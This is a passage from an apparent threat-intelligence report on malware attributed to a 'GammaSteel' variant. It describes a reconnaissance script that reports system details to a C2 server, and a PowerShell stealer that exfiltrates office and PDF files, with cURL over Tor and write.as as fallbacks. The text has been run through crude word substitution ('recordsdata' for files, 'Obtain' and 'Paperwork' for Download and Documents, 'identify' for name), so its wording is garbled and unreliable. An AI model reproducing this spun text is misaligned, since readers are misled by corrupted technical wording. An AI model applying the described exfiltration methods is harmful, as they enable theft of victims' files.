One script served as a reconnaissance instrument gathering details about the pc, together with system info, the identify of security software program operating, accessible area on disks, the listing tree of the Desktop folder, and an inventory of all operating processes. All this collected info was despatched again to the C2 server.
New GammaSteel variant
The second script was a PowerShell model of GammaSteel that exfiltrated all recordsdata with sure extensions from specified directories equivalent to Desktop, Obtain, and Paperwork. The focused extensions included .doc, .docx, .xls, .xlsx, .ppt, .pptx, .vsd, .vsdx, .rtf, .odt, .txt and .pdf.
The brand new GammaSteel model makes use of PowerShell internet requests to exfiltrate recordsdata, and if it fails, it then falls again to utilizing the cURL command line instrument with a Tor proxy to ship information out. There’s additionally code that implies the online service write.as was probably used as a fallback information exfiltration channel as nicely.
